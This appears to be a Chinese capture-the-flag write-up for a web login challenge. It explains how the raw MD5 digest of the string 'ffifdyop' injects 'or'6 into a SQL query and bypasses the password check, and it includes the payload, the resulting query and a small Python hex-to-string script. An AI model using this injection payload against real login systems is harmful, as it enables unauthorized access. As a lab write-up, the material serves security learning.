1)解题链接: http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php
文章图片
2)php源码:
0)
{
echo 'flag is :'.$flag;
}
else{
echo '密码错误!';
}
?>
3)考点:
3.1)SQL注入
3.2)注入点传入参数后通过MD5加密
3.3)字符串“ffifdyop”通过MD5加密后得到 276f722736c95d99e921722cf9ed621c
转换成字符串后得到
'or’6可以成功绕过md5($password,true)最终获得SQL语句:
SELECT * FROM admin WHERE username = 'admin' and password = ''or'6';
3.4)因此Payload为:ffifdyop
!!PS:如何通过Python实现Hex转Str
root@localhost:~/Desktop# cat HexToStr.py
import binascii
MD5 = '276f722736c95d99e921722cf9ed621c'
print binascii.a2b_hex(MD5)
root@localhost:~/Desktop# python HexToStr.py
'or'6?]??!r,??b
【Information|实验吧 后台登录writeup】3.5)GetFlag
![Information|实验吧 后台登录writeup](https://img.it610.com/image/info8/c2c184eb09384cc8addda4dccfb6fe67.jpg)
文章图片
推荐阅读
- Spring|SpringSecurity--自定义登录页面、注销登录配置
- android|逆向工程之表达式优化识别(5)-取模
- Network|Xiang Li
- Web|由浅入深理解PHP反序列化漏洞
- Information|RSA | 模重复平方算法 | C语言实现
- Information|入侵检测基础知识